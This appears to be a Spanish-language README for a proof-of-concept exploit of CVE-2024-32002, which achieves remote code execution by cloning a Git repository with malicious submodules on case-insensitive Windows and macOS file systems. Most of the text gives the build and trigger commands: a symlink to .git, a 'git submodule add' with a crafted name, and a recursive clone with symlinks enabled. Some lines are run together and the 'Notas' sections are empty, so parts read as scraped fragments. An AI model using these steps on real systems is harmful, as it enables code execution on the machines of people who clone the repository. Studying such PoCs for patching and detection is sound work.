
Prueba de concepto de exploit para CVE-2024-32002, que demuestra ejecución remota de código a través de submódulos de Git maliciosos en sistemas de archivos que no distinguen entre mayúsculas y minúsculas.
Un POC para CVE-2024-32002 que demuestra Ejecución Remota de Código (RCE).
Vea cve-2024-32002-poc-rce para el repositorio de submódulos relacionado.
.git..gitmodules que define el submódulo malicioso.Este repositorio se creó en Linux (WSL2, para ser específico). Esto es importante, el repositorio malicioso solo puede crearse en un sistema de archivos que distinga entre mayúsculas y minúsculas.
ln -s .git submodule
Notas:
git submodule add --name rce/notexists https://github.com/JakobTheDev/cve-2024-32002-submodule-rce.git Submodule/modules/rce
Notas:
.git que rastrea el estado de git para los submódulos.Esta vulnerabilidad solo afecta a Windows y MacOS porque ambos tienen sistemas de archivos que no distinguen entre mayúsculas y minúsculas.
git --version
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-rce.git